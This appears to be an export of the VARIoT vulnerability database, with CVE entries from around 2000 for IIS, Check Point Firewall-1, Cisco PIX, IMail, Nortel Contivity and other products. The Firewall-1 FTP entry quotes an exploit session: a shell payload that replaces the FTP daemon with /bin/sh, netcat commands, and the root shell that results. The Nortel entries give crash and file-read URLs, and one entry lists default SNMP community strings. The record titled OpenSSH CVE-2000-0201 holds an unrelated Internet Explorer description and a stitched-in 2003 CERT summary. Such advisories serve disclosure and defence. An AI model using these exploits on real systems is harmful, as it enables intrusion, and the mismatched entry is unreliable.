VARIoT IoT vulnerabilities database

VAR-200004-0018 | CVE-2000-0258 | Microsoft IIS 4.0/5.0 Escape character vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
IIS 4.0 and 5.0 allows remote attackers to cause a denial of service by sending many URLs with a large number of escaped characters, aka the "Myriad Escaped Characters" Vulnerability. Requesting a malformed URL containing numerous escaped characters will cause Microsoft IIS performance to dramatically decrease until the URL has been processed
VAR-200004-0055 | CVE-2000-0301 | Ipswitch IMAIL server Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Ipswitch IMAIL server 6.02 and earlier allows remote attackers to cause a denial of service via the AUTH CRAM-MD5 command. Due to the implementation of IMail's authentication scheme, the server could be remotely forced to stop responding to login requests. If the client fails to terminate the connection, IMail will not be able to authenticate any other users due to the fact that it can only authorize one user at a time.
Once the client times out the connection, IMail will regain normal functionality. Otherwise the service will have to be restarted
VAR-200004-0053 | CVE-2000-0299 | WebObjects Remote Overflow Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Buffer overflow in WebObjects.exe in the WebObjects Developer 4.5 package allows remote attackers to cause a denial of service via an HTTP request with long headers such as Accept. Apple's WebObjects contains an unspecified vulnerability. A denial-of-service vulnerability exists in Apple's WebObjects 4.5 Developer, a popular platform for developing web-based applications. The vulnerable version is the one running on Windows NT 4.0 SP5 in conjunction with the CGI adapter and IIS 4.0.
An HTTP request sent with a long header (i.e., over 4.1K) will crash webobjects.exe. This may also permit the attacker to remotely execute code with the privileges of IIS, but this has not been verified.
This vulnerability is reportedly present only in installations running under a development license. Those licensed for deployment are not affected
VAR-200003-0023 | CVE-2000-0246 | Microsoft IIS UNC Mapping virtual host vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
IIS 4.0 and 5.0 does not properly perform ISAPI extension processing if a virtual directory is mapped to a UNC share, which allows remote attackers to read the source code of ASP and other files, aka the "Virtualized UNC Share" vulnerability. Files located on the local drive where IIS is installed are not affected by this vulnerability
VAR-200003-0057 | CVE-2000-0613 | Cisco Secure PIX Firewall forgery TCP RST Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco Secure PIX Firewall does not properly identify forged TCP Reset (RST) packets, which allows remote attackers to force the firewall to close legitimate connections. The attacker would have to possess detailed knowledge of the connection table in the firewall (which is used to track outgoing connections and disallow any connections from the external network that were not initiated by an internal machine) or be able to otherwise determine the required IP address and port information to exploit this
VAR-200003-0003 | CVE-2000-0226 | Chunked encoding post can consume excessive memory on IIS 4.0 webserver |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
IIS 4.0 allows attackers to cause a denial of service by requesting a large buffer in a POST or PUT command which consumes memory, aka the "Chunked Transfer Encoding Buffer Overflow Vulnerability". Microsoft IIS 4.0, circa March 2000, contained a vulnerability that allowed an intruder to consume unlimited memory on a vulnerable server. Due to unchecked buffer code that handles chunked encoding transfers, remote users are able to consume CPU cycles in Microsoft IIS until the program is rendered completely unstable and eventually crashes. This can cause the server to hang indefinitely until the remote user cancels the session or until the IIS service is stopped and restarted
VAR-200003-0015 | CVE-2000-0238 | Norton AntiVirus Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Buffer overflow in the web server for Norton AntiVirus for Internet Email Gateways allows remote attackers to cause a denial of service via a long URL. Due to unchecked buffer code, the program will crash causing a Dr. Watson error when a URL consisting of a large number of characters is requested
VAR-200003-0048 | CVE-2000-0181 | Check Point Firewall-1 Internal address leak vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Firewall-1 3.0 and 4.0 leaks packets with private IP address information, which could allow remote attackers to determine the real IP address of the host that is making the connection. A vulnerability exists in which Checkpoint Firewall-1 will expose internal addresses to machines outside the network. Under seemingly normal load conditions (according to the poster of this vulnerability, 40% CPU utilization with 200+ active connections), Firewall-1 will attempt to establish connections using the internal address. As this address is either non-routable or internal, a retransmission will occur; the retransmitted packet will have the correct address rewritten, but will use the same source port. This may be particularly useful to attackers conducting client-side attacks.
These problems have been seen on both NT and Solaris versions of FW-1, although the poster indicated that not enough data was available to state directly that the Solaris version was vulnerable in the same ways, or to the same degree
VAR-200010-0084 | CVE-2000-0704 | WorldView Wnn Jserver Remote buffer overflow vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Buffer overflow in SGI Omron WorldView Wnn allows remote attackers to execute arbitrary commands via long JS_OPEN, JS_MKDIR, or JS_FILE_INFO commands. A remote buffer overflow exists in the Asian language servers portion of a number of different implementations of Wnn. It has been reported that only systems that have WorldView Japanese, Korean, and Chinese installed are vulnerable to this issue. Wnn is a Kana-Kanji translation system, most commonly used for foreign language support in Unix systems.
An overflow occurs when the server receives a long string together with a Wnn command such as JS_OPEN, JS_MKDIR or JS_FILE_INFO. By creating a buffer containing machine executable code, it is possible to cause a remote system running the jserver daemon to execute arbitrary commands as the user the daemon is running as. This is frequently root. Wnn is a client-server application, and the Jserver part acts as the server side, providing translation services for clients. Some versions of Wnn have a remote buffer overflow vulnerability. Carefully constructed strings leading to overflows have the potential to execute arbitrary commands with the privileges of the Jserver, usually root
VAR-200003-0033 | CVE-2000-0201 | OpenSSH contains buffer management errors |
CVSS V2: 5.1 CVSS V3: - Severity: MEDIUM |
The window.showHelp() method in Internet Explorer 5.x does not restrict HTML help files (.chm) to be executed from the local host, which allows remote attackers to execute arbitrary commands via Microsoft Networking. Versions of the OpenSSH server prior to 3.7.1 contain buffer management errors. While the full impact of these vulnerabilities is unclear, they may lead to memory corruption and a denial-of-service situation. A vulnerability exists in Microsoft's Remote Procedure Call (RPC) implementation. A remote attacker could exploit this vulnerability to cause a denial of service. An exploit for this vulnerability is publicly available. There is a remote buffer overflow in many versions of Microsoft Windows that allows attackers to execute arbitrary code with system privileges. We are sending this message to help ensure that administrators have not overlooked one or more of these vulnerabilities.
There have been several recent vulnerabilities affecting OpenSSH. It is unclear if these issues are exploitable, but they are resolved in version 3.7.1. These four additional flaws are believed to be relatively minor, and are scheduled to be included in the next version of OpenSSH.
Exploitation of this vulnerability may lead to a remote attacker gaining privileged access to the server, in some cases root access.
VU#209807 - Portable OpenSSH server PAM conversion stack corruption
http://www.kb.cert.org/vuls/id/209807
There is a vulnerability in portable versions of OpenSSH 3.7p1 and 3.7.1p1 that may permit an attacker to corrupt the PAM conversion stack.
Please check the vulnerability notes for resolutions and additional details.
Thank you.
CERT Summary CS-2003-04
November 24, 2003
Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems.
Past CERT summaries are available from:
CERT Summaries
http://www.cert.org/summaries/
______________________________________________________________________
Recent Activity
Since the last regularly scheduled CERT summary, issued in September 2003 (CS-2003-03), we have documented vulnerabilities in the Microsoft Windows Workstation Service, RPCSS Service, and Exchange.
We have received reports of W32/Swen.A, W32/Mimail variants, and exploitation of an Internet Explorer vulnerability reported in August of 2003.
For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change.
CERT/CC Current Activity
http://www.cert.org/current/current_activity.html
1. W32/Mimail Variants
The CERT/CC has received reports of several new variants of the 'Mimail' worm. The most recent variant of the worm (W32/Mimail.J) arrives as an email message alleging to be from the Paypal financial service. The message requests that the recipient 'verify' their account information to prevent the suspension of their Paypal account. Attached to the email is an executable file which captures this information (if entered), and sends it to a number of email addresses.
Current Activity - November 19, 2003
http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili
2.
CERT Advisory CA-2003-28
Buffer Overflow in Windows Workstation Service
http://www.cert.org/advisories/CA-2003-28.html
Vulnerability Note VU#567620
Microsoft Windows Workstation service vulnerable to
buffer overflow when sent specially crafted network
message
http://www.kb.cert.org/vuls/id/567620
3.
CERT Advisory CA-2003-27
Multiple Vulnerabilities in Microsoft Windows and
Exchange
http://www.cert.org/advisories/CA-2003-27.html
Vulnerability Note VU#575892
Buffer overflow in Microsoft Windows Messenger Service
http://www.kb.cert.org/vuls/id/575892
Vulnerability Note VU#422156
Microsoft Exchange Server fails to properly handle
specially crafted SMTP extended verb requests
http://www.kb.cert.org/vuls/id/422156
Vulnerability Note VU#467036
Microsoft Windows Help and support Center contains buffer
overflow in code used to handle HCP protocol
http://www.kb.cert.org/vuls/id/467036
Vulnerability Note VU#989932
Microsoft Windows contains buffer overflow in Local
Troubleshooter ActiveX control (Tshoot.ocx)
http://www.kb.cert.org/vuls/id/989932
Vulnerability Note VU#838572
Microsoft Windows Authenticode mechanism installs ActiveX
controls without prompting user
http://www.kb.cert.org/vuls/id/838572
Vulnerability Note VU#435444
Microsoft Outlook Web Access (OWA) contains cross-site
scripting vulnerability in the "Compose New Message" form
http://www.kb.cert.org/vuls/id/435444
Vulnerability Note VU#967668
Microsoft Windows ListBox and ComboBox controls vulnerable
to buffer overflow when supplied crafted Windows message
http://www.kb.cert.org/vuls/id/967668
4. Multiple Vulnerabilities in SSL/TLS Implementations
Multiple vulnerabilities exist in the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols allowing an attacker to execute arbitrary code or cause a denial-of-service condition.
CERT Advisory CA-2003-26
Multiple Vulnerabilities in SSL/TLS Implementations
http://www.cert.org/advisories/CA-2003-26.html
Vulnerability Note VU#935264
OpenSSL ASN.1 parser insecure memory deallocation
http://www.kb.cert.org/vuls/id/935264
Vulnerability Note VU#255484
OpenSSL contains integer overflow handling ASN.1 tags (1)
http://www.kb.cert.org/vuls/id/255484
Vulnerability Note VU#380864
OpenSSL contains integer overflow handling ASN.1 tags (2)
http://www.kb.cert.org/vuls/id/380864
Vulnerability Note VU#686224
OpenSSL does not securely handle invalid public key when
configured to ignore errors
http://www.kb.cert.org/vuls/id/686224
Vulnerability Note VU#732952
OpenSSL accepts unsolicited client certificate messages
http://www.kb.cert.org/vuls/id/732952
Vulnerability Note VU#104280
Multiple vulnerabilities in SSL/TLS implementations
http://www.kb.cert.org/vuls/id/104280
Vulnerability Note VU#412478
OpenSSL 0.9.6k does not properly handle ASN.1 sequences
http://www.kb.cert.org/vuls/id/412478
5. Exploitation of Internet Explorer Vulnerability
The CERT/CC received a number of reports indicating that attackers were actively exploiting the Microsoft Internet Explorer vulnerability described in VU#865940. These attacks include the installation of tools for launching distributed denial-of-service (DDoS) attacks, providing generic proxy services, reading sensitive information from the Windows registry, and using a victim system's modem to dial pay-per-minute services. The vulnerability described in VU#865940 exists due to an interaction between IE's MIME type processing and the way it handles HTML application (HTA) files embedded in OBJECT tags.
CERT Advisory IN-2003-04
Exploitation of Internet Explorer Vulnerability
http://www.cert.org/incident_notes/IN-2003-04.html
Vulnerability Note VU#865940
Microsoft Internet Explorer does not properly evaluate
"application/hta" MIME type referenced by DATA attribute
of OBJECT element
http://www.kb.cert.org/vuls/id/865940
6. W32/Swen.A Worm
On September 19, the CERT/CC began receiving a large volume of reports of a mass mailing worm, referred to as W32/Swen.A, spreading on the Internet. Similar to W32/Gibe.B in function, this worm arrives as an attachment claiming to be a Microsoft Internet Explorer Update or a delivery failure notice from qmail. The W32/Swen.A worm requires a user to execute the attachment either manually or by using an email client that will open the attachment automatically. Upon opening the attachment, the worm attempts to mail itself to all email addresses it finds on the system. The CERT/CC updated the current activity page to contain further information on this worm.
Current Activity - September 19, 2003
http://www.cert.org/current/archive/2003/09/19/archive.html#swena
7. Buffer Overflow in Sendmail
Sendmail, a widely deployed mail transfer agent (MTA), contains a vulnerability that could allow an attacker to execute arbitrary code with the privileges of the sendmail daemon, typically root.
CERT Advisory CA-2003-25
Buffer Overflow in Sendmail
http://www.cert.org/advisories/CA-2003-25.html
Vulnerability Note VU#784980
Sendmail prescan() buffer overflow vulnerability
http://www.kb.cert.org/vuls/id/784980
8.
CERT Advisory CA-2003-23
RPCSS Vulnerabilities in Microsoft Windows
http://www.cert.org/advisories/CA-2003-23.html
Vulnerability Note VU#483492
Microsoft Windows RPCSS Service contains heap overflow in
DCOM activation routines
http://www.kb.cert.org/vuls/id/483492
Vulnerability Note VU#254236
Microsoft Windows RPCSS Service contains heap overflow in
DCOM request filename handling
http://www.kb.cert.org/vuls/id/254236
Vulnerability Note VU#326746
Microsoft Windows RPC service vulnerable to
denial of service
http://www.kb.cert.org/vuls/id/326746
______________________________________________________________________
New CERT Coordination Center (CERT/CC) PGP Key
On October 15, the CERT/CC issued a new PGP key, which should be used when sending sensitive information to the CERT/CC.
CERT/CC PGP Public Key
https://www.cert.org/pgp/cert_pgp_key.asc
Sending Sensitive Information to the CERT/CC
https://www.cert.org/contact_cert/encryptmail.html
______________________________________________________________________
What's New and Updated
Since the last CERT Summary, we have published new and updated
* Advisories
http://www.cert.org/advisories/
* Vulnerability Notes
http://www.kb.cert.org/vuls
* CERT/CC Statistics
http://www.cert.org/stats/cert_stats.html
* Congressional Testimony
http://www.cert.org/congressional_testimony
* Training Schedule
http://www.cert.org/training/
* CSIRT Development
http://www.cert.org/csirts/
______________________________________________________________________
This document is available from:
http://www.cert.org/summaries/CS-2003-04.html
______________________________________________________________________
CERT/CC Contact Information
Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.
CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.
Using encryption
We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from
http://www.cert.org/CERT_PGP.key
If you prefer to use DES, please call the CERT hotline for more information.
Getting security information
CERT publications and other security information are available from our web site
http://www.cert.org/
To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message
subscribe cert-advisory
* "CERT" and "CERT Coordination Center" are registered in the U.S.
Patent and Trademark Office.
______________________________________________________________________
NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
______________________________________________________________________
Conditions for use, disclaimers, and sponsorship information
Copyright © 2003 Carnegie Mellon University.
VAR-200002-0095 | No CVE | Multiple Vendor SNMP World Writeable Community Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
In a number of network devices/operating systems, some default communities are world-writeable and therefore allow remote users to configure properties of the device/OS without any authorization (other than knowledge of the community name).
Some of the common default communities/vendors are:
public (ascend,cisco,bay networks (nortel),microsoft,sun,3com, aix)
private (cisco,bay networks (nortel),microsoft,3com, brocade, aix, netapp)
write (ascend, very common)
"all private" (sun)
monitor (3com)
manager (3com)
security (3com)
OrigEquipMfr (brocade)
"Secret C0de" (brocade)
admin
default
password
tivoli
openview
community
snmp
snmpd
system (aix, others)
the name of the router (i.e., 'gate')
The attacks can include manipulating routing tables and corrupting ARP caches, which can lead to further compromise. This type of vulnerability has been seen for quite some time; more information on it is listed in the credit section.
NOTE: There may be more products shipping with default read/writeable communities. If you have any more information on what may be vulnerable (more specific firmware versions or corrections), email <vuldb@securityfocus.com>.
VAR-200002-0025 | CVE-2000-0167 | Microsoft IIS 4.0 Pickup table of Contents DoS Vulnerability |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
IIS Inetinfo.exe allows local users to cause a denial of service by creating a mail file with a long name and a .txt.eml extension in the pickup directory. The process inetinfo.exe will crash, resulting in a Dr. Watson access violation error. Restarting IIS is required in order to regain normal functionality
VAR-200002-0050 | CVE-2000-0150 | Multiple vendors' firewalls do not adequately keep state of FTP traffic |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Check Point Firewall-1 allows remote attackers to bypass port access restrictions on an FTP server by forcing it to send malicious packets that Firewall-1 misinterprets as a valid 227 response to a client's PASV attempt. Firewalls and other systems that inspect FTP application layer traffic may not adequately maintain the state of FTP commands and responses. As a result, an attacker could establish arbitrary TCP connections to FTP servers or clients located behind a vulnerable firewall. A vulnerability exists in the way that Checkpoint FireWall-1 handles packets sent from an FTP server to a connecting client. An attacker may be able to exploit this weakness to establish connections to any machine residing behind a FireWall-1 machine, or send packets in to a network protected by a FireWall-1.
FireWall-1 monitors packets from the FTP server to the client, looking for the string "227 " at the beginning of each packet. If FW-1 finds a packet which matches this criteria, it will extract the destination address and port, verify that the specified destination address matches the source of the packet, and allow TCP connections through the firewall to the destination IP and port.
In FireWall-1 4.0, these TCP connections can only send data in one direction. Under FireWall-1 3.0 and prior, this limitation does not exist. In addition, under FW-1 4.0 the data cannot be travelling to a port that is defined in FW-1's list of well known TCP services.
The details of the vulnerability posted by John McDonald <jm@dataprotect.com> contained the following example:
"Here is an example of an attack based on this technique. There is
a FireWall-1 machine between gumpe and the 172.16.0.2 server, which
only permits incoming FTP connections. 172.16.0.2 is a default
Solaris 2.6 install, with the Tooltalk Database vulnerability.
We send the datagram directly to the service's TCP port, in spite of
this port being blocked by the firewall. Note that since there is no
response expected, the one-way restriction doesn't affect this
attack.
All of our testing was done on a Nokia IPSO machine running FW-1
version 4.0.SP-4.
[root@gumpe /root]# strings hackfile
localhost
""""3333DDDD/bin/ksh.-c.cp /usr/sbin/in.ftpd /tmp/in.ftpd.back ; rm -f
/usr/sbin/in.ftpd ; cp /bin/sh /usr/sbin/in.ftpd
[root@gumpe /root]# /sbin/ifconfig eth0 mtu 100
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 21 (?) open
220 sol FTP server (SunOS 5.6) ready.
...........................................227 (172,16,0,2,128,7)
500 '...........................................
[1]+ Stopped nc -vvv 172.16.0.2 21
[root@gumpe /root]# cat killfile | nc -vv 172.16.0.2 32775
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 32775 (?) open
sent 80, rcvd 0
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 21 (?) open
220 sol FTP server (SunOS 5.6) ready.
...........................................227 (172,16,0,2,128,7)
500 '...........................................
[2]+ Stopped nc -vvv 172.16.0.2 21
[root@gumpe /root]# cat hackfile | nc -vv 172.16.0.2 32775
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 32775 (?) open
sent 1168, rcvd 0
[root@gumpe /root]# nc -vvv 172.16.0.2 21
172.16.0.2: inverse host lookup failed:
(UNKNOWN) [172.16.0.2] 21 (?) open
id
uid=0(root) gid=0(root)
There is an easier way to perform a similar attack on this setup, since
the default Solaris FTP daemon allows a bounce attack, but this should
suffice to demonstrate the potential severity of this problem."
In summary, if a network has an FTP server behind a FireWall-1 firewall that is accessible to the outside world, it may be possible for an attacker to open TCP connections to certain ports on that FTP machine.
This vulnerability is not specific to Firewall-1. It has been demonstrated that the PIX firewall, from Cisco, is also vulnerable. Check Point Firewall-1 is vulnerable
VAR-200001-0018 | CVE-2000-0116 | Check Point Firewall-1 Script tag check bypass vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Firewall-1 does not properly filter script tags, which allows remote attackers to bypass the "Strip Script Tags" restriction by including an extra < in front of the SCRIPT tag. Firewall-1 includes the ability to alter script tags in HTML pages before passing them to the client's browser. This alteration invalidates the tag, rendering the script unexecutable by the browser. In version 3, this function can be bypassed by adding an extra opening angle bracket. The tag will be left unmodified, and the browser will be able to execute the contained script. Hostile script could lead to a remote compromise of the client system.
Firewall-1 version 4 will alter the tag as expected
VAR-200001-0040 | CVE-2000-0063 | Nortel Contivity Switch Remote Denial of Service Attack and File Leak Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
cgiproc CGI script in Nortel Contivity HTTP server allows remote attackers to read arbitrary files by specifying the filename in a parameter to the script. The Contivity series is an external network switch product developed by Nortel. The newer Contivity switch includes an httpd server running on the VxWorks operating system to provide a remote Web-based management interface.
A vulnerability exists in the "cgiproc" script implementation of the Web management interface of the Contivity series switches. A remote attacker could use this vulnerability to conduct a denial of service attack on the switch or view arbitrary system files.
Because user input is not sufficiently filtered, passing metacharacters such as "!" or "$" to the cgiproc program will crash the system. Another vulnerability of cgiproc is the lack of authentication when requesting a management page. This enables an attacker to view any file on the web server. A total system crash can occur as a result of exploiting a vulnerability in a cgi-bin program called "cgiproc" that is included with the webserver. If metacharacters such as "!" or "$" are passed to cgiproc, the system will crash (because the characters are not escaped).
foo <foo@blacklisted.intranova.net> provided the following example:
http://x.x.x.x/manage/cgi/cgiproc?$
[crash]
No evidence of this problem being exploited is saved in the logs.
foo <foo@blacklisted.intranova.net> also provided an example for this vulnerability:
http://x.x.x.x/manage/cgi/cgiproc?Nocfile=/name/and/path/of/file.
(interesting places to look: /system/filelist.dat, /system/version.dat, /system/keys, /system/core, etc.)
All that is written to the logs when this is exploited is below:
09:44:23 tEvtLgMgr 0 : Security [12] Management: Request for cgiproc denied. requires login
In order to perform the operations detailed in the report, the "attackers" must be internal, private side users or authenticated tunnel users and the site administrator must allow them HTTP as a management protocol
VAR-200001-0041 | CVE-2000-0064 | Nortel Contivity Switch Remote Denial of Service Attack and File Leak Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
cgiproc CGI script in Nortel Contivity HTTP server allows remote attackers to cause a denial of service via a malformed URL that includes shell metacharacters. The Contivity series is an external network switch product developed by Nortel. The newer Contivity switch includes an httpd server running on the VxWorks operating system to provide a remote Web-based management interface.
A vulnerability exists in the "cgiproc" script implementation of the Web management interface of the Contivity series switches. A remote attacker could use this vulnerability to conduct a denial of service attack on the switch or view arbitrary system files.
Because user input is not sufficiently filtered, passing metacharacters such as "!" or "$" to the cgiproc program will crash the system. Another vulnerability of cgiproc is the lack of authentication when requesting a management page. This enables an attacker to view any file on the web server. A total system crash can occur as a result of exploiting a vulnerability in a cgi-bin program called "cgiproc" that is included with the webserver. If metacharacters such as "!" or "$" are passed to cgiproc, the system will crash (because the characters are not escaped).
foo <foo@blacklisted.intranova.net> provided the following example:
http://x.x.x.x/manage/cgi/cgiproc?$
[crash]
No evidence of this problem being exploited is saved in the logs.
foo <foo@blacklisted.intranova.net> also provided an example for this vulnerability:
http://x.x.x.x/manage/cgi/cgiproc?Nocfile=/name/and/path/of/file.
(interesting places to look: /system/filelist.dat, /system/version.dat, /system/keys, /system/core, etc.)
All that is written to the logs when this is exploited is below:
09:44:23 tEvtLgMgr 0 : Security [12] Management: Request for cgiproc denied. requires login
In order to perform the operations detailed in the report, the "attackers" must be internal, private side users or authenticated tunnel users and the site administrator must allow them HTTP as a management protocol
VAR-200001-0069 | No CVE | Intel InBusiness E-mail Workstation Security Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Intel InBusiness E-mail is a small application server. This product has a security vulnerability that allows unauthorized remote attackers to delete arbitrary files on the hard disk and change the configuration file of the e-mail workstation. Under certain conditions, remote attackers can also read the e-mail of any user on the system. Details: This e-mail workstation runs the VxWorks operating system on a 486 SX25 processor. A daemon called "daynad" is bound to TCP port 244. By simply establishing a TCP connection to this port, many commands can be executed without passing any security authentication, including the following:
FormSet: After the next restart, the e-mail workstation is restored to its factory state. In this state, it uses a DHCP server to obtain its IP address. This also means that after the next restart an attacker can connect to the e-mail workstation without any password and take complete control of the entire device.
FormProtect: After the next restart, the e-mail workstation is restored to its factory state and all passwords are disabled. It can only be restored by reconnecting to port 244 and using the FormSet command.
MakeDir: Creates a directory on the hard disk.
Remove: Removes the specified file from the hard disk, which may be a user's mail or any other file.
Z: Provides a UNIX-style login prompt; entering the superuser password grants access. If the password has been reset using FormSet, the attacker may log in without a password. Once logged in, the attacker may execute arbitrary commands to operate on the hard disk.
Source: Kit Knox (kit@CONNECTNET.COM)
VAR-200001-0034 | CVE-2000-0056 | IMail IMonitor status.cgi DoS Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
IMail IMONITOR status.cgi CGI script allows remote attackers to cause a denial of service with many calls to status.cgi. IMail includes a service called IMail Monitor which is used for local and remote performance measuring and diagnostics. It includes a small webserver operating on port 8181 to support web-based monitoring. One of the cgi scripts, status.cgi, is used to determine which services are currently running and create a web page to report this information. Multiple simultaneous requests for status.cgi will cause the software to crash, with a Dr. Watson error of "Invalid Memory Address". There is a vulnerability in the IMail IMONITOR status.cgi CGI script
VAR-199912-0007 | CVE-1999-1042 | Cisco Resource Manager Information disclosure vulnerability |
CVSS V2: 1.2 CVSS V3: - Severity: LOW |
Cisco Resource Manager (CRM) 1.0 and 1.1 creates world-readable log files and temporary files, which may expose sensitive information, such as user IDs, passwords and SNMP community strings, to local users. Cisco Resource Manager is prone to an information disclosure vulnerability.
Attackers can exploit this issue to gain access to sensitive information
VAR-199912-0022 | CVE-1999-1100 | Cisco PIX Private Link Profile Encryption Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Cisco PIX Private Link 4.1.6 and earlier does not properly process certain commands in the configuration file, which reduces the effective key length of the DES key to 48 bits instead of 56 bits, which makes it easier for an attacker to find the proper key via a brute force attack. Cisco Pix Private Link is prone to a remote security vulnerability.
Attackers can exploit this issue to perform unauthorized actions. This may aid in further attacks